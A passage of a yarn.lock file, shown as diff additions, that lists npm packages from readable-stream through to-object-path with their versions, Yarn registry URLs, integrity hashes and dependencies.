readable-stream@^2.0.4, readable-stream@^2.0.6, readable-stream@^2.1.5, readable-stream@^2.2.2, readable-stream@^2.3.3, readable-stream@^2.3.6: + version "2.3.6" + resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-2.3.6.tgz#b11c27d88b8ff1fbe070643cf94b0c79ae1b0aaf" + dependencies: + core-util-is "~1.0.0" + inherits "~2.0.3" + isarray "~1.0.0" + process-nextick-args "~2.0.0" + safe-buffer "~5.1.1" + string_decoder "~1.1.1" + util-deprecate "~1.0.1" + +readable-stream@1.0: + version "1.0.34" + resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-1.0.34.tgz#125820e34bc842d2f2aaafafe4c2916ee32c157c" + dependencies: + core-util-is "~1.0.0" + inherits "~2.0.1" + isarray "0.0.1" + string_decoder "~0.10.x" + +readdirp@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/readdirp/-/readdirp-2.1.0.tgz#4ed0ad060df3073300c48440373f72d1cc642d78" + dependencies: + graceful-fs "^4.1.2" + minimatch "^3.0.2" + readable-stream "^2.0.2" + set-immediate-shim "^1.0.1" + +redent@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/redent/-/redent-2.0.0.tgz#c1b2007b42d57eb1389079b3c8333639d5e1ccaa" + dependencies: + indent-string "^3.0.0" + strip-indent "^2.0.0" + +reduce-css-calc@^1.2.6: + version "1.3.0" + resolved "https://registry.yarnpkg.com/reduce-css-calc/-/reduce-css-calc-1.3.0.tgz#747c914e049614a4c9cfbba629871ad1d2927716" + dependencies: + balanced-match "^0.4.2" + math-expression-evaluator "^1.2.14" + reduce-function-call "^1.0.1" + +reduce-function-call@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/reduce-function-call/-/reduce-function-call-1.0.2.tgz#5a200bf92e0e37751752fe45b0ab330fd4b6be99" + dependencies: + balanced-match "^0.4.2" + +reduce@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/reduce/-/reduce-1.0.1.tgz#14fa2e5ff1fc560703a020cbb5fbaab691565804" + dependencies: + object-keys "~1.0.0" + +regenerate-unicode-properties@^7.0.0: + version "7.0.0" + resolved 
"https://registry.yarnpkg.com/regenerate-unicode-properties/-/regenerate-unicode-properties-7.0.0.tgz#107405afcc4a190ec5ed450ecaa00ed0cafa7a4c" + dependencies: + regenerate "^1.4.0" + +regenerate@^1.2.1, regenerate@^1.4.0: + version "1.4.0" + resolved "https://registry.yarnpkg.com/regenerate/-/regenerate-1.4.0.tgz#4a856ec4b56e4077c557589cae85e7a4c8869a11" + +regenerator-runtime@^0.11.0, regenerator-runtime@^0.11.1: + version "0.11.1" + resolved "https://registry.yarnpkg.com/regenerator-runtime/-/regenerator-runtime-0.11.1.tgz#be05ad7f9bf7d22e056f9726cee5017fbf19e2e9" + +regenerator-transform@^0.12.3: + version "0.12.4" + resolved "https://registry.yarnpkg.com/regenerator-transform/-/regenerator-transform-0.12.4.tgz#aa9b6c59f4b97be080e972506c560b3bccbfcff0" + dependencies: + private "^0.1.6" + +regex-cache@^0.4.2: + version "0.4.4" + resolved "https://registry.yarnpkg.com/regex-cache/-/regex-cache-0.4.4.tgz#75bdc58a2a1496cec48a12835bc54c8d562336dd" + dependencies: + is-equal-shallow "^0.1.3" + +regex-not@^1.0.0, regex-not@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/regex-not/-/regex-not-1.0.2.tgz#1f4ece27e00b0b65e0247a6810e6a85d83a5752c" + dependencies: + extend-shallow "^3.0.2" + safe-regex "^1.1.0" + +regexpu-core@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-1.0.0.tgz#86a763f58ee4d7c2f6b102e4764050de7ed90c6b" + dependencies: + regenerate "^1.2.1" + regjsgen "^0.2.0" + regjsparser "^0.1.4" + +regexpu-core@^4.1.3, regexpu-core@^4.1.4: + version "4.2.0" + resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-4.2.0.tgz#a3744fa03806cffe146dea4421a3e73bdcc47b1d" + dependencies: + regenerate "^1.4.0" + regenerate-unicode-properties "^7.0.0" + regjsgen "^0.4.0" + regjsparser "^0.3.0" + unicode-match-property-ecmascript "^1.0.4" + unicode-match-property-value-ecmascript "^1.0.2" + +register-service-worker@^1.2.0: + version "1.4.1" + resolved 
"https://registry.yarnpkg.com/register-service-worker/-/register-service-worker-1.4.1.tgz#4b4c9b4200fc697942c6ae7d611349587b992b2f" + +registry-auth-token@^3.0.1: + version "3.3.2" + resolved "https://registry.yarnpkg.com/registry-auth-token/-/registry-auth-token-3.3.2.tgz#851fd49038eecb586911115af845260eec983f20" + dependencies: + rc "^1.1.6" + safe-buffer "^5.0.1" + +registry-url@^3.0.3: + version "3.1.0" + resolved "https://registry.yarnpkg.com/registry-url/-/registry-url-3.1.0.tgz#3d4ef870f73dde1d77f0cf9a381432444e174942" + dependencies: + rc "^1.0.1" + +regjsgen@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.2.0.tgz#6c016adeac554f75823fe37ac05b92d5a4edb1f7" + +regjsgen@^0.4.0: + version "0.4.0" + resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.4.0.tgz#c1eb4c89a209263f8717c782591523913ede2561" + +regjsparser@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.1.5.tgz#7ee8f84dc6fa792d3fd0ae228d24bd949ead205c" + dependencies: + jsesc "~0.5.0" + +regjsparser@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.3.0.tgz#3c326da7fcfd69fa0d332575a41c8c0cdf588c96" + dependencies: + jsesc "~0.5.0" + +relateurl@0.2.x: + version "0.2.7" + resolved "https://registry.yarnpkg.com/relateurl/-/relateurl-0.2.7.tgz#54dbf377e51440aca90a4cd274600d3ff2d888a9" + +remove-array-items@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/remove-array-items/-/remove-array-items-1.0.0.tgz#07bf42cb332f4cf6e85ead83b5e4e896d2326b21" + +remove-trailing-separator@^1.0.1: + version "1.1.0" + resolved "https://registry.yarnpkg.com/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz#c24bce2a283adad5bc3f58e0d48249b92379d8ef" + +renderkid@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/renderkid/-/renderkid-2.0.1.tgz#898cabfc8bede4b7b91135a3ffd323e58c0db319" + dependencies: + css-select "^1.1.0" + dom-converter 
"~0.1" + htmlparser2 "~3.3.0" + strip-ansi "^3.0.0" + utila "~0.3" + +repeat-element@^1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/repeat-element/-/repeat-element-1.1.2.tgz#ef089a178d1483baae4d93eb98b4f9e4e11d990a" + +repeat-string@^1.5.2, repeat-string@^1.6.1: + version "1.6.1" + resolved "https://registry.yarnpkg.com/repeat-string/-/repeat-string-1.6.1.tgz#8dcae470e1c88abc2d600fff4a776286da75e637" + +require-from-string@^1.1.0: + version "1.2.1" + resolved "https://registry.yarnpkg.com/require-from-string/-/require-from-string-1.2.1.tgz#529c9ccef27380adfec9a2f965b649bbee636418" + +resolve-cwd@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/resolve-cwd/-/resolve-cwd-2.0.0.tgz#00a9f7387556e27038eae232caa372a6a59b665a" + dependencies: + resolve-from "^3.0.0" + +resolve-from@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/resolve-from/-/resolve-from-3.0.0.tgz#b22c7af7d9d6881bc8b6e653335eebcb0a188748" + +resolve-path@^1.3.3, resolve-path@^1.4.0: + version "1.4.0" + resolved "https://registry.yarnpkg.com/resolve-path/-/resolve-path-1.4.0.tgz#c4bda9f5efb2fce65247873ab36bb4d834fe16f7" + dependencies: + http-errors "~1.6.2" + path-is-absolute "1.0.1" + +resolve-url@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/resolve-url/-/resolve-url-0.2.1.tgz#2c637fe77c893afd2a663fe21aa9080068e2052a" + +resolve@^1.2.0, resolve@^1.3.2, resolve@^1.6.0: + version "1.8.1" + resolved "https://registry.yarnpkg.com/resolve/-/resolve-1.8.1.tgz#82f1ec19a423ac1fbd080b0bab06ba36e84a7a26" + dependencies: + path-parse "^1.0.5" + +restore-cursor@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/restore-cursor/-/restore-cursor-2.0.0.tgz#9f7ee287f82fd326d4fd162923d62129eee0dfaf" + dependencies: + onetime "^2.0.0" + signal-exit "^3.0.2" + +ret@~0.1.10: + version "0.1.15" + resolved "https://registry.yarnpkg.com/ret/-/ret-0.1.15.tgz#b8a4825d5bdb1fc3f6f53c2bc33f81388681c7bc" + +rimraf@^2.5.4, rimraf@^2.6.1, 
rimraf@^2.6.2: + version "2.6.2" + resolved "https://registry.yarnpkg.com/rimraf/-/rimraf-2.6.2.tgz#2ed8150d24a16ea8651e6d6ef0f47c4158ce7a36" + dependencies: + glob "^7.0.5" + +ripemd160@^2.0.0, ripemd160@^2.0.1: + version "2.0.2" + resolved "https://registry.yarnpkg.com/ripemd160/-/ripemd160-2.0.2.tgz#a1c1a6f624751577ba5d07914cbc92850585890c" + dependencies: + hash-base "^3.0.0" + inherits "^2.0.1" + +run-queue@^1.0.0, run-queue@^1.0.3: + version "1.0.3" + resolved "https://registry.yarnpkg.com/run-queue/-/run-queue-1.0.3.tgz#e848396f057d223f24386924618e25694161ec47" + dependencies: + aproba "^1.1.1" + +safe-buffer@^5.0.1, safe-buffer@^5.1.0, safe-buffer@^5.1.1, safe-buffer@^5.1.2, safe-buffer@~5.1.0, safe-buffer@~5.1.1: + version "5.1.2" + resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.1.2.tgz#991ec69d296e0313747d59bdfd2b745c35f8828d" + +safe-regex@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/safe-regex/-/safe-regex-1.1.0.tgz#40a3669f3b077d1e943d44629e157dd48023bf2e" + dependencies: + ret "~0.1.10" + +"safer-buffer@>= 2.1.2 < 3": + version "2.1.2" + resolved "https://registry.yarnpkg.com/safer-buffer/-/safer-buffer-2.1.2.tgz#44fa161b0187b9549dd84bb91802f9bd8385cd6a" + +sax@0.5.x: + version "0.5.8" + resolved "https://registry.yarnpkg.com/sax/-/sax-0.5.8.tgz#d472db228eb331c2506b0e8c15524adb939d12c1" + +sax@^1.2.4, sax@~1.2.1: + version "1.2.4" + resolved "https://registry.yarnpkg.com/sax/-/sax-1.2.4.tgz#2816234e2378bddc4e5354fab5caa895df7100d9" + +schema-utils@^0.4.0, schema-utils@^0.4.2, schema-utils@^0.4.3, schema-utils@^0.4.4, schema-utils@^0.4.5: + version "0.4.5" + resolved "https://registry.yarnpkg.com/schema-utils/-/schema-utils-0.4.5.tgz#21836f0608aac17b78f9e3e24daff14a5ca13a3e" + dependencies: + ajv "^6.1.0" + ajv-keywords "^3.1.0" + +section-matter@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/section-matter/-/section-matter-1.0.0.tgz#e9041953506780ec01d59f292a19c7b850b84167" + dependencies: 
+ extend-shallow "^2.0.1" + kind-of "^6.0.0" + +select@^1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/select/-/select-1.1.2.tgz#0e7350acdec80b1108528786ec1d4418d11b396d" + +semver-diff@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/semver-diff/-/semver-diff-2.1.0.tgz#4bbb8437c8d37e4b0cf1a68fd726ec6d645d6d36" + dependencies: + semver "^5.0.3" + +"semver@2 || 3 || 4 || 5", semver@^5.0.3, semver@^5.1.0, semver@^5.3.0, semver@^5.4.1, semver@^5.5.0: + version "5.5.0" + resolved "https://registry.yarnpkg.com/semver/-/semver-5.5.0.tgz#dc4bbc7a6ca9d916dee5d43516f0092b58f7b8ab" + +serialize-javascript@^1.3.0, serialize-javascript@^1.4.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/serialize-javascript/-/serialize-javascript-1.5.0.tgz#1aa336162c88a890ddad5384baebc93a655161fe" + +set-blocking@~2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/set-blocking/-/set-blocking-2.0.0.tgz#045f9782d011ae9a6803ddd382b24392b3d890f7" + +set-immediate-shim@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/set-immediate-shim/-/set-immediate-shim-1.0.1.tgz#4b2b1b27eb808a9f8dcc481a58e5e56f599f3f61" + +set-value@^0.4.3: + version "0.4.3" + resolved "https://registry.yarnpkg.com/set-value/-/set-value-0.4.3.tgz#7db08f9d3d22dc7f78e53af3c3bf4666ecdfccf1" + dependencies: + extend-shallow "^2.0.1" + is-extendable "^0.1.1" + is-plain-object "^2.0.1" + to-object-path "^0.3.0" + +set-value@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/set-value/-/set-value-2.0.0.tgz#71ae4a88f0feefbbf52d1ea604f3fb315ebb6274" + dependencies: + extend-shallow "^2.0.1" + is-extendable "^0.1.1" + is-plain-object "^2.0.3" + split-string "^3.0.1" + +setimmediate@^1.0.4: + version "1.0.5" + resolved "https://registry.yarnpkg.com/setimmediate/-/setimmediate-1.0.5.tgz#290cbb232e306942d7d7ea9b83732ab7856f8285" + +setprototypeof@1.1.0: + version "1.1.0" + resolved 
"https://registry.yarnpkg.com/setprototypeof/-/setprototypeof-1.1.0.tgz#d0bd85536887b6fe7c0d818cb962d9d91c54e656" + +sha.js@^2.4.0, sha.js@^2.4.8: + version "2.4.11" + resolved "https://registry.yarnpkg.com/sha.js/-/sha.js-2.4.11.tgz#37a5cf0b81ecbc6943de109ba2960d1b26584ae7" + dependencies: + inherits "^2.0.1" + safe-buffer "^5.0.1" + +shebang-command@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/shebang-command/-/shebang-command-1.2.0.tgz#44aac65b695b03398968c39f363fee5deafdf1ea" + dependencies: + shebang-regex "^1.0.0" + +shebang-regex@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/shebang-regex/-/shebang-regex-1.0.0.tgz#da42f49740c0b42db2ca9728571cb190c98efea3" + +signal-exit@^3.0.0, signal-exit@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/signal-exit/-/signal-exit-3.0.2.tgz#b5fdc08f1287ea1178628e415e25132b73646c6d" + +slash@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/slash/-/slash-1.0.0.tgz#c41f2f6c39fc16d1cd17ad4b5d896114ae470d55" + +slice-ansi@1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/slice-ansi/-/slice-ansi-1.0.0.tgz#044f1a49d8842ff307aad6b505ed178bd950134d" + dependencies: + is-fullwidth-code-point "^2.0.0" + +snapdragon-node@^2.0.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/snapdragon-node/-/snapdragon-node-2.1.1.tgz#6c175f86ff14bdb0724563e8f3c1b021a286853b" + dependencies: + define-property "^1.0.0" + isobject "^3.0.0" + snapdragon-util "^3.0.1" + +snapdragon-util@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/snapdragon-util/-/snapdragon-util-3.0.1.tgz#f956479486f2acd79700693f6f7b805e45ab56e2" + dependencies: + kind-of "^3.2.0" + +snapdragon@^0.8.1: + version "0.8.2" + resolved "https://registry.yarnpkg.com/snapdragon/-/snapdragon-0.8.2.tgz#64922e7c565b0e14204ba1aa7d6964278d25182d" + dependencies: + base "^0.11.1" + debug "^2.2.0" + define-property "^0.2.5" + extend-shallow "^2.0.1" + map-cache "^0.2.2" + 
source-map "^0.5.6" + source-map-resolve "^0.5.0" + use "^3.1.0" + +sort-keys@^1.0.0: + version "1.1.2" + resolved "https://registry.yarnpkg.com/sort-keys/-/sort-keys-1.1.2.tgz#441b6d4d346798f1b4e49e8920adfba0e543f9ad" + dependencies: + is-plain-obj "^1.0.0" + +source-list-map@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/source-list-map/-/source-list-map-2.0.0.tgz#aaa47403f7b245a92fbc97ea08f250d6087ed085" + +source-map-resolve@^0.5.0: + version "0.5.2" + resolved "https://registry.yarnpkg.com/source-map-resolve/-/source-map-resolve-0.5.2.tgz#72e2cc34095543e43b2c62b2c4c10d4a9054f259" + dependencies: + atob "^2.1.1" + decode-uri-component "^0.2.0" + resolve-url "^0.2.1" + source-map-url "^0.4.0" + urix "^0.1.0" + +source-map-url@^0.4.0: + version "0.4.0" + resolved "https://registry.yarnpkg.com/source-map-url/-/source-map-url-0.4.0.tgz#3e935d7ddd73631b97659956d55128e87b5084a3" + +source-map@0.1.x: + version "0.1.43" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.1.43.tgz#c24bc146ca517c1471f5dacbe2571b2b7f9e3346" + dependencies: + amdefine ">=0.0.4" + +source-map@0.5.6: + version "0.5.6" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.6.tgz#75ce38f52bf0733c5a7f0c118d81334a2bb5f412" + +source-map@0.5.x, source-map@^0.5.0, source-map@^0.5.3, source-map@^0.5.6: + version "0.5.7" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.7.tgz#8a039d2d1021d22d1ea14c80d8ea468ba2ef3fcc" + +source-map@^0.6.1, source-map@~0.6.1: + version "0.6.1" + resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.6.1.tgz#74722af32e9614e9c287a8d0bbde48b5e2f1a263" + +spdx-correct@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-correct/-/spdx-correct-3.0.0.tgz#05a5b4d7153a195bc92c3c425b69f3b2a9524c82" + dependencies: + spdx-expression-parse "^3.0.0" + spdx-license-ids "^3.0.0" + +spdx-exceptions@^2.1.0: + version "2.1.0" + resolved 
"https://registry.yarnpkg.com/spdx-exceptions/-/spdx-exceptions-2.1.0.tgz#2c7ae61056c714a5b9b9b2b2af7d311ef5c78fe9" + +spdx-expression-parse@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-expression-parse/-/spdx-expression-parse-3.0.0.tgz#99e119b7a5da00e05491c9fa338b7904823b41d0" + dependencies: + spdx-exceptions "^2.1.0" + spdx-license-ids "^3.0.0" + +spdx-license-ids@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/spdx-license-ids/-/spdx-license-ids-3.0.0.tgz#7a7cd28470cc6d3a1cfe6d66886f6bc430d3ac87" + +split-string@^3.0.1, split-string@^3.0.2: + version "3.1.0" + resolved "https://registry.yarnpkg.com/split-string/-/split-string-3.1.0.tgz#7cb09dda3a86585705c64b39a6466038682e8fe2" + dependencies: + extend-shallow "^3.0.0" + +sprintf-js@~1.0.2: + version "1.0.3" + resolved "https://registry.yarnpkg.com/sprintf-js/-/sprintf-js-1.0.3.tgz#04e6926f662895354f3dd015203633b857297e2c" + +ssri@^5.2.4: + version "5.3.0" + resolved "https://registry.yarnpkg.com/ssri/-/ssri-5.3.0.tgz#ba3872c9c6d33a0704a7d71ff045e5ec48999d06" + dependencies: + safe-buffer "^5.1.1" + +static-extend@^0.1.1: + version "0.1.2" + resolved "https://registry.yarnpkg.com/static-extend/-/static-extend-0.1.2.tgz#60809c39cbff55337226fd5e0b520f341f1fb5c6" + dependencies: + define-property "^0.2.5" + object-copy "^0.1.0" + +"statuses@>= 1.4.0 < 2", statuses@^1.2.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/statuses/-/statuses-1.5.0.tgz#161c7dac177659fd9811f43771fa99381478628c" + +std-env@^1.1.0, std-env@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/std-env/-/std-env-1.3.0.tgz#8ce754a401a61f1ac49c8eb55f2a8c0c63d54954" + dependencies: + is-ci "^1.1.0" + +stream-browserify@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/stream-browserify/-/stream-browserify-2.0.1.tgz#66266ee5f9bdb9940a4e4514cafb43bb71e5c9db" + dependencies: + inherits "~2.0.1" + readable-stream "^2.0.2" + +stream-each@^1.1.0: + version "1.2.2" 
+ resolved "https://registry.yarnpkg.com/stream-each/-/stream-each-1.2.2.tgz#8e8c463f91da8991778765873fe4d960d8f616bd" + dependencies: + end-of-stream "^1.1.0" + stream-shift "^1.0.0" + +stream-http@^2.7.2: + version "2.8.3" + resolved "https://registry.yarnpkg.com/stream-http/-/stream-http-2.8.3.tgz#b2d242469288a5a27ec4fe8933acf623de6514fc" + dependencies: + builtin-status-codes "^3.0.0" + inherits "^2.0.1" + readable-stream "^2.3.6" + to-arraybuffer "^1.0.0" + xtend "^4.0.0" + +stream-shift@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/stream-shift/-/stream-shift-1.0.0.tgz#d5c752825e5367e786f78e18e445ea223a155952" + +stream-slice@^0.1.2: + version "0.1.2" + resolved "https://registry.yarnpkg.com/stream-slice/-/stream-slice-0.1.2.tgz#2dc4f4e1b936fb13f3eb39a2def1932798d07a4b" + +strict-uri-encode@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/strict-uri-encode/-/strict-uri-encode-1.1.0.tgz#279b225df1d582b1f54e65addd4352e18faa0713" + +string-width@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/string-width/-/string-width-1.0.2.tgz#118bdf5b8cdc51a2a7e70d211e07e2b0b9b107d3" + dependencies: + code-point-at "^1.0.0" + is-fullwidth-code-point "^1.0.0" + strip-ansi "^3.0.0" + +"string-width@^1.0.2 || 2", string-width@^2.0.0, string-width@^2.1.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/string-width/-/string-width-2.1.1.tgz#ab93f27a8dc13d28cac815c462143a6d9012ae9e" + dependencies: + is-fullwidth-code-point "^2.0.0" + strip-ansi "^4.0.0" + +string@^3.3.3, string@~3.3.3: + version "3.3.3" + resolved "https://registry.yarnpkg.com/string/-/string-3.3.3.tgz#5ea211cd92d228e184294990a6cc97b366a77cb0" + +string_decoder@^1.0.0, string_decoder@~1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/string_decoder/-/string_decoder-1.1.1.tgz#9cf1611ba62685d7030ae9e4ba34149c3af03fc8" + dependencies: + safe-buffer "~5.1.0" + +string_decoder@~0.10.x: + version "0.10.31" + resolved 
"https://registry.yarnpkg.com/string_decoder/-/string_decoder-0.10.31.tgz#62e203bc41766c6c28c9fc84301dab1c5310fa94" + +strip-ansi@^3.0.0, strip-ansi@^3.0.1: + version "3.0.1" + resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-3.0.1.tgz#6a385fb8853d952d5ff05d0e8aaf94278dc63dcf" + dependencies: + ansi-regex "^2.0.0" + +strip-ansi@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-4.0.0.tgz#a8479022eb1ac368a871389b635262c505ee368f" + dependencies: + ansi-regex "^3.0.0" + +strip-bom-string@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/strip-bom-string/-/strip-bom-string-1.0.0.tgz#e5211e9224369fbb81d633a2f00044dc8cedad92" + +strip-bom@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/strip-bom/-/strip-bom-3.0.0.tgz#2334c18e9c759f7bdd56fdef7e9ae3d588e68ed3" + +strip-eof@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/strip-eof/-/strip-eof-1.0.0.tgz#bb43ff5598a6eb05d89b59fcd129c983313606bf" + +strip-indent@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/strip-indent/-/strip-indent-2.0.0.tgz#5ef8db295d01e6ed6cbf7aab96998d7822527b68" + +strip-json-comments@~2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/strip-json-comments/-/strip-json-comments-2.0.1.tgz#3c531942e908c2697c0ec344858c286c7ca0a60a" + +stylus-loader@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/stylus-loader/-/stylus-loader-3.0.2.tgz#27a706420b05a38e038e7cacb153578d450513c6" + dependencies: + loader-utils "^1.0.2" + lodash.clonedeep "^4.5.0" + when "~3.6.x" + +stylus@^0.54.5: + version "0.54.5" + resolved "https://registry.yarnpkg.com/stylus/-/stylus-0.54.5.tgz#42b9560931ca7090ce8515a798ba9e6aa3d6dc79" + dependencies: + css-parse "1.7.x" + debug "*" + glob "7.0.x" + mkdirp "0.5.x" + sax "0.5.x" + source-map "0.1.x" + +supports-color@^2.0.0: + version "2.0.0" + resolved 
"https://registry.yarnpkg.com/supports-color/-/supports-color-2.0.0.tgz#535d045ce6b6363fa40117084629995e9df324c7" + +supports-color@^3.2.3: + version "3.2.3" + resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-3.2.3.tgz#65ac0504b3954171d8a64946b2ae3cbb8a5f54f6" + dependencies: + has-flag "^1.0.0" + +supports-color@^5.3.0, supports-color@^5.4.0: + version "5.4.0" + resolved "https://registry.yarnpkg.com/supports-color/-/supports-color-5.4.0.tgz#1c6b337402c2137605efe19f10fec390f6faab54" + dependencies: + has-flag "^3.0.0" + +svgo@^0.7.0: + version "0.7.2" + resolved "https://registry.yarnpkg.com/svgo/-/svgo-0.7.2.tgz#9f5772413952135c6fefbf40afe6a4faa88b4bb5" + dependencies: + coa "~1.0.1" + colors "~1.1.2" + csso "~2.3.1" + js-yaml "~3.7.0" + mkdirp "~0.5.1" + sax "~1.2.1" + whet.extend "~0.9.9" + +table@^4.0.3: + version "4.0.3" + resolved "https://registry.yarnpkg.com/table/-/table-4.0.3.tgz#00b5e2b602f1794b9acaf9ca908a76386a7813bc" + dependencies: + ajv "^6.0.1" + ajv-keywords "^3.0.0" + chalk "^2.1.0" + lodash "^4.17.4" + slice-ansi "1.0.0" + string-width "^2.1.1" + +tapable@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/tapable/-/tapable-1.0.0.tgz#cbb639d9002eed9c6b5975eb20598d7936f1f9f2" + +tar@^4: + version "4.4.4" + resolved "https://registry.yarnpkg.com/tar/-/tar-4.4.4.tgz#ec8409fae9f665a4355cc3b4087d0820232bb8cd" + dependencies: + chownr "^1.0.1" + fs-minipass "^1.2.5" + minipass "^2.3.3" + minizlib "^1.1.0" + mkdirp "^0.5.0" + safe-buffer "^5.1.2" + yallist "^3.0.2" + +term-size@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/term-size/-/term-size-1.2.0.tgz#458b83887f288fc56d6fffbfad262e26638efa69" + dependencies: + execa "^0.7.0" + +text-table@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/text-table/-/text-table-0.2.0.tgz#7f5ee823ae805207c00af2df4a84ec3fcfa570b4" + +thenify-all@^1.0.0: + version "1.6.0" + resolved 
"https://registry.yarnpkg.com/thenify-all/-/thenify-all-1.6.0.tgz#1a1918d402d8fc3f98fbf234db0bcc8cc10e9726" + dependencies: + thenify ">= 3.1.0 < 4" + +"thenify@>= 3.1.0 < 4": + version "3.3.0" + resolved "https://registry.yarnpkg.com/thenify/-/thenify-3.3.0.tgz#e69e38a1babe969b0108207978b9f62b88604839" + dependencies: + any-promise "^1.0.0" + +through2@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/through2/-/through2-2.0.3.tgz#0004569b37c7c74ba39c43f3ced78d1ad94140be" + dependencies: + readable-stream "^2.1.5" + xtend "~4.0.1" + +through@~2.3.4: + version "2.3.8" + resolved "https://registry.yarnpkg.com/through/-/through-2.3.8.tgz#0dd4c9ffaabc357960b1b724115d7e0e86a2e1f5" + +time-fix-plugin@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/time-fix-plugin/-/time-fix-plugin-2.0.3.tgz#b6b1ead519099bc621e28edb77dac7531918b7e1" + +timed-out@^4.0.0: + version "4.0.1" + resolved "https://registry.yarnpkg.com/timed-out/-/timed-out-4.0.1.tgz#f32eacac5a175bea25d7fab565ab3ed8741ef56f" + +timers-browserify@^2.0.4: + version "2.0.10" + resolved "https://registry.yarnpkg.com/timers-browserify/-/timers-browserify-2.0.10.tgz#1d28e3d2aadf1d5a5996c4e9f95601cd053480ae" + dependencies: + setimmediate "^1.0.4" + +tiny-emitter@^2.0.0: + version "2.0.2" + resolved "https://registry.yarnpkg.com/tiny-emitter/-/tiny-emitter-2.0.2.tgz#82d27468aca5ade8e5fd1e6d22b57dd43ebdfb7c" + +to-arraybuffer@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/to-arraybuffer/-/to-arraybuffer-1.0.1.tgz#7d229b1fcc637e466ca081180836a7aabff83f43" + +to-factory@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/to-factory/-/to-factory-1.0.0.tgz#8738af8bd97120ad1d4047972ada5563bf9479b1" + +to-fast-properties@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/to-fast-properties/-/to-fast-properties-2.0.0.tgz#dc5e698cbd079265bc73e0377681a4e4e83f616e" + +to-object-path@^0.3.0: + version "0.3.0" + resolved 
